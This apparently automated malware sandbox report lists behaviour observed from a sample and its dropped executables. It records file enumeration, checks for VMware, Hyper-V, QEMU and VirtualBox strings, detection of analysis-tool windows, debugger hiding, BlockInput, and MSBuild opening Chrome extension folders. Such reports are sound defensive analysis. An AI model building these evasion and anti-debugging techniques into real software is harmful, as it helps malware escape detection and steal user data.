Source: C:\Windows\System32\svchost.exe File Volume queried: C:\Windows\System32 FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\10352530101\amnew.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00E4DBBE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E1C2A2 FindFirstFileExW, 0_2_00E1C2A2
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E568EE FindFirstFileW,FindClose, 0_2_00E568EE
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00E5698F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D076
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E4D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00E4D3A9
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E59B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00E59B2B
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F2F4 FindFirstFileExW, 22_2_00007FF748F4F2F4
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F4F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 22_2_00007FF748F4F478
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F2F4 FindFirstFileExW, 25_2_00007FF73879F2F4
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF73879F478 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 25_2_00007FF73879F478
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: powershell.exe, 00000005.00000002.912679466.0000000008450000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:06e6
Source: chrome.exe, 0000002D.00000002.1846093562.00005B0401778000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesP
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical ProcessormuiEG
Source: MSBuild.exe, 00000018.00000002.1572221480.0000000001275000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWG$
Source: 466a80d633.exe.21.dr, 01ea7855d3.exe.43.dr Binary or memory string: XQEmU
Source: 466a80d633.exe, 00000032.00000003.1740940032.0000000004D60000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMUU
Source: apple.exe, 0000001C.00000002.1563949033.00000000065F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: MSBuild.exe, 00000018.00000002.1572221480.0000000001275000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000018.00000002.1571634668.000000000123C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor$S,
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partitiony
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid Partition
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor,
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1693723887.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root PartitionD
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95EA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration Servicex
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.957958679.00000000015CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition[
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus PipesJ
Source: chrome.exe, 0000002D.00000002.1743321721.000001F7D1C36000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partition
Source: powershell.exe, 00000005.00000002.910102296.0000000007262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y=
Source: powershell.exe, 00000008.00000002.990342238.0000015533E4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp, 466a80d633.exe, 00000032.00000002.1925697033.0000000000B18000.00000040.00000001.01000000.0000001C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D5940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V aivsyofviydytbq Bus
Source: chrome.exe, 0000002D.00000002.1846617251.00005B0401950000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 0000002D.00000003.1693982103.000001F7D95FC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1692991767.000001F7D95FC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1696457795.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1700413896.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1705420225.000001F7D95E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 00000008.00000002.990863464.000001553406F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000003.1693723887.000001F7D95C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0b784c52-0db5-4ac0-abda-f47798123e96
Source: powershell.exe, 00000008.00000002.990342238.0000015533E4C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root Partition
Source: chrome.exe, 0000002D.00000003.1657767128.00005B04002F4000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: chrome.exe, 0000002D.00000003.1700413896.000001F7D95E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor}
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V aivsyofviydytbq Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisor
Source: chrome.exe, 0000002D.00000002.1841155266.00005B0401474000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=0b784c52-0db5-4ac0-abda-f47798123e96
Source: powershell.exe, 00000005.00000002.910550227.0000000007312000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000002D.00000002.1743321721.000001F7D1BC9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000005.00000002.910102296.0000000007262000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: apple.exe, 0000001C.00000002.1563949033.00000000065F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 0000002D.00000002.1745063061.000001F7D589B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual ProcessorskG$
Source: chrome.exe, 0000002D.00000002.1743321721.000001F7D1C00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisoriU
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9554000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processor.muigG(
Source: chrome.exe, 0000002D.00000002.1747651599.000001F7D9733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000A.00000002.956968320.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE, 0000000B.00000002.996513045.0000000000C98000.00000040.00000001.01000000.0000000B.sdmp, rapes.exe, 0000000C.00000002.991548172.0000000000CF8000.00000040.00000001.01000000.0000000F.sdmp, 466a80d633.exe, 00000032.00000002.1925697033.0000000000B18000.00000040.00000001.01000000.0000001C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Thread information set: HideFromDebugger
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Windows\System32\sppsvc.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10352660101\466a80d633.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp6TLPBUFIWYONQFSE0X1ZJBAG0KQU6TU1.EXE Code function: 10_2_054C094D rdtsc 10_2_054C094D
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 24_2_00448E10 LdrInitializeThunk, 24_2_00448E10
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E5EAA2 BlockInput, 0_2_00E5EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E12622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E12622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00DE42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00DE42DE
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E04CE8 mov eax, dword ptr fs:[00000030h] 0_2_00E04CE8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E40B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 0_2_00E40B62
Enables debug privileges
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E12622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E12622
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E0083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00E0083F
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E009D5 SetUnhandledExceptionFilter, 0_2_00E009D5
Source: C:\Users\user\Desktop\Af3hqfTjFh.exe Code function: 0_2_00E00C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00E00C21
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F41A20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00007FF748F41A20
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F383F8 SetUnhandledExceptionFilter, 22_2_00007FF748F383F8
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F38408 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 22_2_00007FF748F38408
Source: C:\Users\user\AppData\Local\Temp\10345240101\EPTwCQd.exe Code function: 22_2_00007FF748F38088 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 22_2_00007FF748F38088
Source: C:\Users\user\AppData\Local\Temp\10347640101\q4jfn3p.exe Code function: 25_2_00007FF738791A20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 25_2_00007FF738791A20
